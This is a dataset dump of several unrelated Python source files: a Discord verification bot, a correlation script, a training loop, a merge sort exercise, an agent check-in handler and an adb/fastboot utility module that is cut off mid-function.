get(ctx.guild.roles, id=482582199204446209) # 22-25\n age5 = get(ctx.guild.roles, id=482582199753900032) # 26-29\n age6 = get(ctx.guild.roles, id=482582200181850123) # 30-34\n age7 = get(ctx.guild.roles, id=482872100420321281) # 35+\n role_men = get(ctx.guild.roles, id=482977157581373465) #'Verifiers' role\n\n if av in 
ctx.author.roles:\n return await ctx.send(\"You're already verified, what more do you want from me?!\")\n if age1 in ctx.author.roles or age2 in ctx.author.roles:\n return await ctx.send(\"Uh oh, verification is only for people above 18.\")\n if (\n age3 in ctx.author.roles\n or age4 in ctx.author.roles\n or age5 in ctx.author.roles\n or age6 in ctx.author.roles\n or age7 in ctx.author.roles\n ):\n await ctx.author.add_roles(role_add) # Adds 'PENDING VERIFICATION' role\n await role_men.edit(mentionable=True) # Makes 'Verifiers' mentionable\n await ctx.send(\n f\"{role_men.mention}, {ctx.author.mention} would like to get verified.\"\n )\n await role_men.edit(mentionable=False) # Makes 'Verifiers' unmentionable\n else:\n await ctx.send(\n \"Are you sure you've read <#482572215330799627> properly? Because it doesn't look like it.\"\n )\n\n @commands.command(hidden=True)\n @commands.guild_only()\n async def coconut(self, ctx: commands.Context):\n \"\"\"That's a secret.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n await ctx.message.delete()\n\n role_add = get(ctx.guild.roles, id=482693992732164098) #'Secret role' role\n role_rem = get(ctx.guild.roles, id=491277913862176769) #'I can't read' role\n\n if role_rem in ctx.author.roles: # Checks if author has 'I can't read'\n await ctx.author.add_roles(role_add) # Adds 'Secret role'\n await ctx.author.remove_roles(role_rem) # Removes 'I can't read' role\n await ctx.author.send(\n f\"Congratulations, {ctx.author.name}, you can officially read! 
<:sauriHype:528330460779118603> You have received your 10 cookies!\"\n )\n else:\n await ctx.send(\"Good try.\")\n\n # FOR VERIFIERS:\n @commands.command()\n @commands.guild_only()\n async def v(self, ctx: commands.Context, target: discord.Member):\n \"\"\"Verified\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_add = get(ctx.guild.roles, id=482562076364242944) # Verified\n role_rem = get(\n ctx.guild.roles, id=482655573964488706\n ) #'PENDING VERIFICATION' role\n\n if role_add in target.roles:\n return await ctx.send(f\"Uh oh, {target.mention} is already verified.\")\n if role_rem in target.roles:\n await target.add_roles(role_add) # Adds Verified\n await target.remove_roles(role_rem) # Removes 'PENDING VERIFICATION' role\n await ctx.send(f\"{target.mention}, welcome to the adulthood.\")\n log = get(ctx.guild.text_channels, id=483698888386019335) # mod-log channel\n embed = discord.Embed(\n colour=await ctx.embed_colour(),\n title=\"Verification approved\",\n )\n embed.set_author(\n name=f\"{target.name}#{target.discriminator} ({target.id})\",\n icon_url=target.avatar_url,\n )\n embed.add_field(\n name=\"Moderator:\",\n value=f\"{ctx.author.name}#{ctx.author.discriminator} ({ctx.author.id})\",\n )\n await log.send(embed=embed)\n else:\n await ctx.send(\n f\"Uh oh, {target.display_name} did not request verification.\"\n )\n\n @commands.command()\n @commands.guild_only()\n async def d(self, ctx: commands.Context, target: discord.Member):\n \"\"\"Denies verification.\"\"\"\n if ctx.guild.id != 482560976307355658:\n return\n\n role_rem = get(\n ctx.guild.roles, id=482655573964488706\n ) #'PENDING VERIFICATION' role\n\n if role_rem in target.roles:\n await target.remove_roles(role_rem) # Removes 'PENDING VERIFICATION' role\n await ctx.send(\"Awww, maybe next time...\")\n log = get(ctx.guild.text_channels, id=483698888386019335) # mod-log channel\n embed = discord.Embed(\n colour=await ctx.embed_colour(), title=\"Verification denied\"\n )\n 
embed.set_author(\n name=f\"{target.name}#{target.discriminator} ({target.id})\",\n icon_url=target.avatar_url,\n )\n embed.add_field(\n name=\"Moderator:\",\n value=f\"{ctx.author.name}#{ctx.author.discriminator} ({ctx.author.id})\",\n )\n await log.send(embed=embed)\n else:\n await ctx.send(\n f\"Uh oh, {target.display_name} did not request verification.\"\n )\n","sub_path":"gamers/gamers.py","file_name":"gamers.py","file_ext":"py","file_size_in_byte":11713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"450921717","text":"#!/usr/bin/python\n\n\nimport json\nimport argparse as ap\nimport os, sys\nfrom datetime import datetime\n\nimport numpy as np\nfrom scipy import stats\nfrom scipy.stats import spearmanr, kurtosis\nfrom math import sqrt\n\nimport warnings\nwarnings.filterwarnings('error')\ndate_format = \"%Y-%m-%d\"\n\nparser = ap.ArgumentParser(description = \"Computes correlations for a \" \\\n \"JSON file containing time series for a term.\")\n\nparser.add_argument( \"-i\", \"--in_file\", type=ap.FileType(\"r\"), default=sys.stdin, help = \\\n \"The JSON file to read time series from. If not specified, standard \" \\\n \"input will be used.\")\n\nparser.add_argument(\"-p\", \"--pretty\", action=\"store_true\", help = \"Pretty print the \" \\\n \"output file.\")\n\nparser.add_argument(\"-o\", \"--out_file\", type=ap.FileType(\"w\"), default=sys.stdout, help = \\\n \"The file to be output. 
If not specified, the standard output will be used.\")\n\n\ndef get_correlation_confidence(series1, series2):\n\n if len(series1) != len(series2): \n raise ValueError(\"Series must have the same length\")\n\n series_length = len(series1)\n\n correlations = []\n n = 0\n for i in range(series_length):\n\n if series1[i] != 0 or series2[i] != 0:\n n += 1\n\n s1_temp = series1[0:i] + series1[i+1:]\n s2_temp = series2[0:i] + series2[i+1:]\n \n if sum(s1_temp) > 0 and sum(s2_temp) > 0:\n spear = spearmanr(s1_temp, s2_temp)\n correlations.append(spearmanr(s1_temp, s2_temp)[0])\n\n if len(correlations) == 0:\n return (0, 1, 0)\n \n mean, sigma = np.mean(correlations), np.std(correlations)\n\n if sigma > 0: \n\n CI = stats.norm.interval(0.95, loc=mean,\n scale=sigma/sqrt(len(correlations)))\n CI_size = CI[1] - CI[0]\n k = kurtosis(correlations)\n else:\n CI_size = 0\n k = 0\n\n return (mean, CI_size, n)\n\n\nargs = parser.parse_args()\n\nwith args.in_file as json_file:\n with args.out_file as out_file:\n parsed_json = json.loads(json_file.read())\n\n terms = sorted(parsed_json[\"series\"].keys())\n names = sorted(parsed_json[\"series\"][terms[0]].keys())\n\n n_terms = len(terms)\n n_names = len(names)\n\n nodes = [ { \\\n \"name\": names[i], \\\n \"index\": i, \\\n \"color_value\": 0, \\\n \"size\": 20 } \\\n for i in range(n_names) ]\n\n\n links = { term: [] for term in parsed_json[\"series\"].keys() }\n\n for term, series in parsed_json[\"series\"].items():\n for i in [ i for i in range(n_names) if names[i] in series ]:\n for j in [ j for j in range(i + 1, n_names) if names[j] in series ]:\n\n correlation_confidence = get_correlation_confidence(\\\n series[names[i]], \\\n series[names[j]])\n\n links[term].append( { \"source\": i, \\\n \"target\": j, \\\n \"value\" : correlation_confidence })\n\n\n if args.pretty:\n out_file.write(json.dumps( { \\\n \"nodes\" : nodes, \\\n \"links\" : links }, \\\n indent = 4, separators = (\",\",\":\")))\n else:\n 
out_file.write(json.dumps( { \\\n \"nodes\" : nodes, \\\n \"links\" : links } ))\n\n\n","sub_path":"second_stage/correlate.py","file_name":"correlate.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157478754","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nmicropy.data\n~~~~~~~~~~~~~~\n\nThis module is merely to provide an easy method of locating\ndata files used by MicropyCli\n\"\"\"\n\nfrom pathlib import Path\n\nMOD_PATH = Path(__file__).parent\nPATH = MOD_PATH.resolve()\nSCHEMAS = PATH / 'schemas'\n\n__all__ = [\"PATH\", \"SCHEMAS\"]\n","sub_path":"micropy/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"467186807","text":"import numpy\nimport os\nimport sys\nimport time\nimport core.loader as loader\nimport core.helper as helper\n\nsave_path = 'save'\nresult_path = 'result'\n\nif len(sys.argv) > 1:\n config_path = sys.argv[1]\nelse:\n config_path = input('configure file : ')\n\nsave_path = './{}/{}'.format(save_path, os.path.splitext(os.path.basename(config_path))[0])\nresult_path = './{}/{}'.format(result_path, os.path.splitext(os.path.basename(config_path))[0])\nconfig = loader.load(config_path)\nvariable = helper.init_variable(config)\n\nhelper.load_session(variable['saver'], variable['session'], save_path)\n\nwhile True:\n begin_time = time.time()\n\n ep = variable['session'].run(variable['epoch'])\n if (config['max_epoch'] > 0) and (ep > config['max_epoch']):\n break\n print('Epoch: {}'.format(ep))\n\n lr = config['learning_rate']['type'](ep, config['learning_rate']['option'])\n print(' Learning rate: {}'.format(lr))\n\n # Training\n batch_num = helper.get_batch_number(config['data']['train'].size, config['batch_size'])\n progress_bar = helper.get_progress_bar(batch_num, 10)\n for i in range(batch_num):\n batch_input, 
batch_output = config['data']['train'].next_batch(config['batch_size'])\n batch_size = len(batch_output[0])\n feed = {variable['learning_rate']: lr}\n feed.update(helper.get_train_feed(config, batch_input, batch_output))\n variable['session'].run(variable['optimizer'], feed_dict=feed)\n\n if i in progress_bar:\n feed = helper.get_test_feed(config, batch_input, batch_output)\n loss = variable['session'].run(variable['loss'], feed_dict=feed)\n accuracy = variable['session'].run(variable['accuracy'], feed_dict=feed)\n print(' {}% - Batch accuracy: {}, Batch avg loss: {}'.format(helper.get_progress(progress_bar, i),\n accuracy,\n loss))\n print(' Completed')\n\n # Testing\n batch_num = helper.get_batch_number(config['data']['test'].size, config['batch_size'])\n correct = [0] * len(variable['accuracy'])\n for i in range(batch_num):\n batch_input, batch_output = config['data']['test'].next_batch(config['batch_size'])\n batch_size = len(batch_output[0])\n feed = helper.get_test_feed(config, batch_input, batch_output)\n accuracy = variable['session'].run(variable['accuracy'], feed_dict=feed)\n sub_correct = numpy.round(numpy.multiply(accuracy, batch_size)).astype(numpy.int)\n correct = numpy.sum([correct, sub_correct], axis=0)\n correct = numpy.divide(correct, config['data']['test'].size)\n print(' Test accuracy: {}'.format(correct))\n\n helper.save_session(variable['saver'], variable['session'], save_path)\n print(' Updated save file')\n\n if not os.path.isdir(os.path.dirname(result_path)):\n os.makedirs(os.path.dirname(result_path))\n with open(result_path, 'a') as stream:\n stream.write('Epoch: {}\\n'.format(ep))\n stream.write(' Accuracy: {}\\n'.format(correct))\n print(' Updated result file')\n\n end_time = time.time()\n print(' Elapsed time: {}'.format(end_time - 
begin_time))\n\nvariable['session'].close()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"389729751","text":"# Python program for implementation of MergeSort \ndef mergeSort(arr):\n # print(arr)\n if len(arr) == 1:\n return arr\n elif len(arr) == 0:\n return\n\n else:\n l = 0\n r = len(arr) - 1\n m = int((l + r)/2)\n sorted_left = mergeSort(arr[l:m+1])\n sorted_right = mergeSort(arr[m+1:])\n\n \n left_i = 0\n right_i = 0\n final_sorted = []\n while left_i <= len(sorted_left) and right_i <= len(sorted_right):\n print(sorted_right,sorted_left)\n if left_i >= len(sorted_left) and right_i < len(sorted_right) :\n for val in sorted_right[right_i:]:\n final_sorted.append(val)\n break\n\n elif right_i >= len(sorted_right) and left_i < len(sorted_left):\n for val in sorted_left[left_i:]:\n final_sorted.append(val)\n break\n\n else: \n if sorted_left[left_i] < sorted_right[right_i]:\n final_sorted.append(sorted_left[left_i])\n left_i += 1\n elif sorted_right[right_i] < sorted_left[left_i]:\n final_sorted.append(sorted_right[right_i])\n right_i += 1\n else:\n final_sorted.append(sorted_right[right_i])\n final_sorted.append(sorted_left[left_i])\n left_i += 1\n right_i += 1\n return final_sorted\n \n# Code to print the list \ndef printList(arr): \n print(arr)\n #write your code here\n \n# driver code to test the above code \nif __name__ == '__main__': \n arr = [12, 11, 13, 5, 6, 7,8,7,4,5,1] \n print (\"Given array is\", end=\"\\n\") \n printList(arr) \n arr = mergeSort(arr) \n print(\"Sorted array is: \", end=\"\\n\") \n printList(arr) \n","sub_path":"Exercise_4.py","file_name":"Exercise_4.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"291516632","text":"from base64 import b64decode\nfrom flask import json, request\nfrom 
backend.rabbitmq import rabbit_producer\nfrom models.agent_checkin import AgentCheckin\nfrom processing import agent_task_message\nfrom logger import log\n\n\ndef agent_checkin_json(agent_checkin):\n result = dict(\n {\n \"AgentId\": agent_checkin.AgentId,\n \"IV\": agent_checkin.IV,\n \"HMAC\": agent_checkin.HMAC,\n \"Message\": agent_checkin.Message\n })\n return result\n\n\ndef get_agent_checkin(agent_checkin_id='all'):\n if agent_checkin_id == 'all':\n result = []\n agent_messages = AgentCheckin.query.all()\n for agent_message in agent_messages:\n result.append(agent_checkin_json(agent_message))\n else:\n agent_message = AgentCheckin.query.get(agent_checkin_id)\n result = agent_checkin_json(agent_message)\n return result\n\n\ndef add_agent_checkin(agent_name, transport_id=None, source_ip=None, message=None):\n hmac = None\n iv = None\n msg = None\n if message:\n decoded_checkin = b64decode(message)\n checkin_dict = json.loads(decoded_checkin)\n hmac = checkin_dict[\"HMAC\"]\n iv = checkin_dict[\"IV\"]\n msg = checkin_dict[\"Message\"]\n\n if not source_ip:\n source_ip = request.remote_addr\n\n if not transport_id:\n transport_id = 1\n\n checkin = {\n 'AgentName': agent_name,\n 'TransportId': transport_id,\n 'SourceIp': source_ip,\n 'HMAC': hmac,\n 'IV': iv,\n 'Message': msg\n }\n\n log(\"add_agent_task_response\", \"publishing?\")\n rabbit_producer.send_request('NewAgentCheckin', checkin)\n return {\n 'Success': True,\n 'Result': checkin\n }\n\n\ndef process_agent_checkin(agent_name, transport_id=None, source_ip=None, message=None):\n result = add_agent_checkin(agent_name, transport_id, source_ip, message)\n return agent_task_message.get_unsent_agent_task_messages(agent_name)\n","sub_path":"processing/agent_checkin.py","file_name":"agent_checkin.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"52761406","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = 'cohorts'\nurlpatterns = [\n # ex: /cohorts/\n path('', views.index, name='index'),\n # ex: /cohorts/5/\n path('/', views.detail, name='detail')\n]","sub_path":"nss/nss/cohorts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"554317784","text":"\"\"\"\nmodule models. describe models Enemy and Player :)\n\"\"\"\n\n\nfrom random import randint\nfrom exceptions import EnemyDown\nfrom exceptions import GameOver\nfrom settings import LIVES\n\n\nclass Enemy:\n \"\"\"\n Class Enemy. describe model Enemy:)\n \"\"\"\n\n def __init__(self, level):\n \"\"\"\n init method :)\n \"\"\"\n self.level = level\n self.lives = level\n\n @staticmethod\n def select_attack():\n \"\"\"\n method atack. random :)\n \"\"\"\n return int(randint(1, 3))\n\n def decrease_lives(self):\n \"\"\"\n method decrease_lives. :)\n \"\"\"\n self.lives = self.lives-1\n print(f\"Enemy lives - {self.lives}\")\n if not self.lives:\n raise EnemyDown()\n\n\nclass Player:\n \"\"\"\n Class Player. 
describe model Player:)\n \"\"\"\n\n def __init__(self, pl_name):\n \"\"\"\n method init :)\n \"\"\"\n self.pl_name = pl_name\n self.lives = LIVES\n self.score = 0\n\n @staticmethod\n def fight(attack, defense):\n \"\"\"\n method fight :)\n \"\"\"\n win = [(1, 2), (2, 3), (3, 1)]\n lose = [(1, 3), (2, 1), (3, 2)]\n draw = [(1, 1), (2, 2), (3, 3)]\n fight_case = (int(attack), int(defense))\n if fight_case in win:\n return 1\n if fight_case in lose:\n return -1\n if fight_case in draw:\n return 0\n return 0\n\n def decrease_lives(self):\n \"\"\"\n method decrease_lives :)\n \"\"\"\n self.lives = self.lives-1\n print(f\"your lives - {self.lives}\")\n if not self.lives:\n print(f\"your score - {self.score}\\n\")\n raise GameOver(self)\n\n @staticmethod\n def attack(enemy_obj):\n \"\"\"\n method atack :)\n \"\"\"\n pl_choise = input(\"Your attack, Make your choise [1-3] : \")\n enemy_attack = Enemy.select_attack()\n if Player.fight(pl_choise, enemy_attack) > 0:\n print(\"You attacked successfully!\")\n enemy_obj.decrease_lives()\n elif Player.fight(pl_choise, enemy_attack) < 0:\n print(\"You missed!\")\n else:\n print(\"It's a draw!\")\n\n def defence(self, enemy_obj):\n \"\"\"\n method defence :)\n \"\"\"\n pl_choise = input(\"You defence, Make your choise [1-3] : \")\n enemy_attack = enemy_obj.select_attack()\n if Player.fight(enemy_attack, pl_choise) > 0:\n print(\"Enemy attacked successfully!\")\n self.decrease_lives()\n elif Player.fight(enemy_attack, pl_choise) < 0:\n print(\"Enemy missed!\")\n else:\n print(\"It's a draw!\")\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"380908859","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 
http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utility module for interaction with adb.\"\"\"\nimport json\nimport os\nimport subprocess\nimport time\n\nfrom gazoo_device import config\nfrom gazoo_device import errors\nfrom gazoo_device import gdm_logger\nfrom gazoo_device.utility import host_utils\n\nimport six\n\nADB_RETRY_SLEEP = 10\nFASTBOOT_TIMEOUT = 10.0\nPROPERTY_PATTERN = r\"\\[(.*)\\]: \\[(.*)\\]\\n\"\nSYSENV_PATTERN = r\"(.*)=(.*)\\n\"\nlogger = gdm_logger.get_logger()\n\n\ndef enter_fastboot(adb_serial, adb_path=None):\n \"\"\"Enters fastboot mode by calling 'adb reboot bootloader' for the adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from calling 'adb reboot' or None if call fails with\n non-zero\n return code.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. 
If adb returns a non-zero return code then None will be\n returned.\n \"\"\"\n return _adb_command((\"reboot\", \"bootloader\"), adb_serial, adb_path=adb_path)\n\n\ndef exit_fastboot(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Exits fastboot mode by calling 'fastboot reboot' for the fastboot_serial provided.\n\n Args:\n fastboot_serial (str): Device fastboot serial number.\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot reboot to return\n\n Raises:\n RuntimeError: if fastboot_path is invalid or fastboot executable was not\n found by get_fastboot_path.\n\n Returns:\n str: Output from calling 'fastboot reboot' or None if call fails with\n non-zero\n return code.\n\n Note:\n If fastboot_path is not provided then path returned by get_fastboot_path\n will be used instead. If fastboot returns a non-zero return code then\n None will be returned.\n \"\"\"\n if fastboot_path is None:\n fastboot_path = get_fastboot_path()\n\n if not os.path.exists(fastboot_path):\n raise RuntimeError(\n \"The fastboot_path of {} appears to be invalid.\".format(fastboot_path))\n\n try:\n args = (\"timeout\", str(timeout), fastboot_path, \"-s\", fastboot_serial,\n \"reboot\")\n return subprocess.check_output(\n args, stderr=subprocess.STDOUT).decode(\"utf-8\", \"replace\")\n except subprocess.CalledProcessError:\n return None\n\n\ndef fastboot_unlock_device(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Unlock the device through fastboot.\n\n Args:\n fastboot_serial (str): Device serial number\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot command to return\n\n Returns:\n str: response from fastboot command\n \"\"\"\n return _fastboot_command((\"flashing\", \"unlock\"),\n fastboot_serial=fastboot_serial,\n fastboot_path=fastboot_path,\n timeout=timeout)\n\n\ndef 
fastboot_lock_device(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Lock the device through fastboot.\n\n Args:\n fastboot_serial (str): Device serial number\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot command to return\n\n Returns:\n str: response from fastboot command\n \"\"\"\n return _fastboot_command((\"flashing\", \"lock\"),\n fastboot_serial=fastboot_serial,\n fastboot_path=fastboot_path,\n timeout=timeout)\n\n\ndef fastboot_wipe_userdata(fastboot_serial,\n fastboot_path=None,\n timeout=FASTBOOT_TIMEOUT):\n \"\"\"Wipe user data on the device through fastboot.\n\n Args:\n fastboot_serial (str): Device serial number\n fastboot_path (str): optional alternative path to fastboot executable\n timeout (float): in seconds to wait for fastboot command to return\n\n Returns:\n str: response from fastboot command\n \"\"\"\n return _fastboot_command(\n \"-w\",\n fastboot_serial=fastboot_serial,\n fastboot_path=fastboot_path,\n timeout=timeout)\n\n\ndef enter_sideload(adb_serial, adb_path=None, auto_reboot=False):\n \"\"\"Enters sideload mode by calling 'adb reboot sideload' for the adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable.\n auto_reboot (bool): whether to auto reboot after sideload complete.\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n str: Output from command call.\n \"\"\"\n if auto_reboot:\n command = (\"reboot\", \"sideload-auto-reboot\")\n else:\n command = (\"reboot\", \"sideload\")\n return _adb_command(command, adb_serial=adb_serial, adb_path=adb_path)\n\n\ndef is_sideload_mode(adb_serial, adb_path=None):\n \"\"\"Checks if device is in sideload mode.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if 
adb_path is invalid or adb_path executable was not\n found by\n get_adb_path().\n\n Returns:\n bool: True if device is in sideload mode. False otherwise.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n return adb_serial in get_sideload_devices(adb_path=adb_path)\n\n\ndef sideload_package(package_path, adb_serial, adb_path=None):\n \"\"\"Perform \"adb sideload \" command.\n\n Args:\n package_path (str): the path of the package to sideload.\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable.\n\n Returns:\n str: the command output.\n\n Raises:\n RuntimeError: if package_path is invalid.\n \"\"\"\n if not os.path.isfile(package_path):\n raise RuntimeError(\n \"sideload_package failed: {} is not a file.\".format(package_path))\n return _adb_command((\"sideload\", package_path),\n adb_serial=adb_serial,\n adb_path=adb_path)\n\n\ndef get_sideload_devices(adb_path=None):\n \"\"\"Returns a list of adb devices in sideload mode.\n\n Args:\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n list: A list of device serial numbers that are in sideload mode.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n try:\n output = _adb_command(\"devices\", adb_path=adb_path)\n except RuntimeError as err:\n logger.warning(repr(err))\n return []\n device_lines = [x for x in output.splitlines() if \"\\tsideload\" in x]\n return [x.split()[0] for x in device_lines]\n\n\ndef get_adb_devices(adb_path=None):\n \"\"\"Returns a list of available adb devices.\n\n Args:\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n list: A list of device serial numbers returned by 'adb 
devices'.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n try:\n output = _adb_command(\"devices\", adb_path=adb_path)\n except RuntimeError as err:\n logger.warning(repr(err))\n return []\n device_lines = [x for x in output.splitlines() if \"\\tdevice\" in x]\n return [x.split()[0].split(\":\", 1)[0] for x in device_lines]\n\n\ndef get_adb_path(adb_path=None):\n \"\"\"Returns the correct adb path to use.\n\n Args:\n adb_path (str): path to \"adb\" executable.\n\n Notes: Starts with passed in path, then looks at config, and finally\n system's default adb if available.\n\n Raises:\n RuntimeError: if no valid adb path could be found\n\n Returns:\n str: Path to correct adb executable to use.\n \"\"\"\n if is_valid_path(adb_path):\n return adb_path\n try:\n with open(config.DEFAULT_GDM_CONFIG_FILE) as config_file:\n gdm_config = json.load(config_file)\n adb_path = gdm_config[config.ADB_BIN_PATH_CONFIG]\n except (IOError, KeyError, ValueError):\n pass\n\n if is_valid_path(adb_path):\n return adb_path\n elif adb_path:\n logger.warning(\"adb path {!r} stored in {} does not exist.\"\n .format(adb_path, config.DEFAULT_GDM_CONFIG_FILE))\n\n if host_utils.has_command(\"adb\"):\n return host_utils.get_command_path(\"adb\")\n raise RuntimeError(\"No valid adb path found using 'which adb'\")\n\n\ndef is_valid_path(path):\n return path and os.path.exists(path)\n\n\ndef connect(adb_serial, adb_path=None):\n \"\"\"Connects to device via ADB.\"\"\"\n resp = _adb_command([\"connect\", adb_serial], adb_path=None)\n if \"unable to connect\" in str(resp):\n raise errors.DeviceError(\n f\"Unable to connect to device {adb_serial!r} via ADB: {resp}\")\n\n\ndef shell(adb_serial, command, adb_path=None, timeout=None, retries=1):\n \"\"\"Issues a command to the shell of the adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number\n command (str): command to send\n adb_path (str): optional alternative path to adb 
executable\n timeout (int): time in seconds to wait for adb process to complete.\n retries (int): number of times to retry adb command.\n\n Returns:\n str: response from adb command\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n return _adb_command([\"shell\", command], adb_serial,\n adb_path=adb_path, timeout=timeout, retries=retries)\n\n\ndef get_fastboot_devices(fastboot_path=None):\n \"\"\"Returns list of ADB devices in fastboot (bootloader) mode.\n\n Args:\n fastboot_path (str): optional alternative path to fastboot executable\n\n Returns:\n list: A list of ADB device serial numbers in fastboot mode.\n\n Note:\n If fastboot_path is not provided then path returned by get_fastboot_path\n will be used instead.\n If fastboot path invalid, will return empty list.\n \"\"\"\n try:\n fastboot_path = get_fastboot_path(fastboot_path)\n except RuntimeError as err:\n logger.warning(repr(err))\n return []\n\n try:\n output = subprocess.check_output((fastboot_path, \"devices\"),\n stderr=subprocess.STDOUT)\n output = output.decode(\"utf-8\", \"replace\")\n device_lines = [x for x in output.splitlines() if \"astboot\" in x]\n return [x.split()[0] for x in device_lines]\n except subprocess.CalledProcessError:\n return []\n\n\ndef get_fastboot_path(fastboot_path=None):\n \"\"\"Returns the fastboot executable path to use.\n\n Args:\n fastboot_path (str): path to \"fastboot\" executable.\n\n Raises:\n RuntimeError: if no valid fastboot executable could be found\n\n Returns:\n str: Path to correct fastboot executable to use.\n \"\"\"\n if is_valid_path(fastboot_path):\n return fastboot_path\n if host_utils.has_command(\"fastboot\"):\n return host_utils.get_command_path(\"fastboot\")\n raise RuntimeError(\"No valid fastboot path found using 'which fastboot'\")\n\n\ndef is_adb_mode(adb_serial, adb_path=None):\n \"\"\"Checks if device is in adb mode.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): 
optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path.\n\n Returns:\n bool: True if device is in adb mode. False otherwise.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead.\n \"\"\"\n return adb_serial in get_adb_devices(adb_path=adb_path)\n\n\ndef is_device_online(adb_serial, adb_path=None, fastboot_path=None):\n \"\"\"Returns true if the device appears in either 'adb devices' or 'fastboot devices'.\n\n Args:\n adb_serial (str): Device serial number.\n adb_path (str): optional alternative path to adb executable\n fastboot_path (str): optional alternative path to fastboot executable\n\n Returns:\n bool: True if device is in adb or fastboot mode. False otherwise.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If fastboot_path is not provided then path returned by\n get_fastboot_path will be used instead.\n \"\"\"\n return (is_adb_mode(adb_serial, adb_path=adb_path) or\n is_fastboot_mode(adb_serial, fastboot_path=fastboot_path))\n\n\ndef is_fastboot_mode(adb_serial, fastboot_path=None):\n \"\"\"Checks if device is in fastboot mode.\n\n Args:\n adb_serial (str): Device serial number.\n fastboot_path (str): optional alternative path to fastboot executable\n\n Raises:\n RuntimeError: if fastboot_path is invalid or fastboot executable was\n not found by get_fastboot_path.\n\n Returns:\n bool: True if device is in fastboot mode. 
False otherwise.\n\n Note:\n If fastboot_path is not provided then path returned by get_fastboot_path\n will be used instead.\n \"\"\"\n return adb_serial in get_fastboot_devices(fastboot_path=fastboot_path)\n\n\ndef pull_from_device(adb_serial, sources, destination_path=\"./\", adb_path=None):\n \"\"\"Pulls sources from device to destination_path on host for adb_serial provided.\n\n Args:\n adb_serial (str): Device serial number.\n sources (str or list): Path to one or more source files on device to\n copy to host.\n destination_path (str): Path to destination on host computer where file\n should copied to.\n adb_path (str): optional alternative path to adb executable\n\n Raises:\n RuntimeError: if adb_path is invalid or adb executable was not found by\n get_adb_path or push failed.\n ValueError: if destination_path directory doesn't exist.\n\n Returns:\n str: Output from calling 'adb push' or None if call raises an erroro\n return code.\n\n Note:\n If adb_path is not provided then path returned by get_adb_path will be\n used instead. If adb returns a non-zero return code then None will be\n returned. If no destination_path is provided the file will be copied to\n the current working directory on the host computer.\n \"\"\"\n destination_dir = os.path.dirname(destination_path)\n if destination_dir != \".\" and not os.path.exists(destination_dir):\n raise ValueError(\n \"The destination_path directory {} appears to be invalid.\".format(\n destination_dir))\n\n args = [\"pull\"]\n if isinstance(sources, list):\n for source_path in sources:\n args.append(source_path)\n else:\n 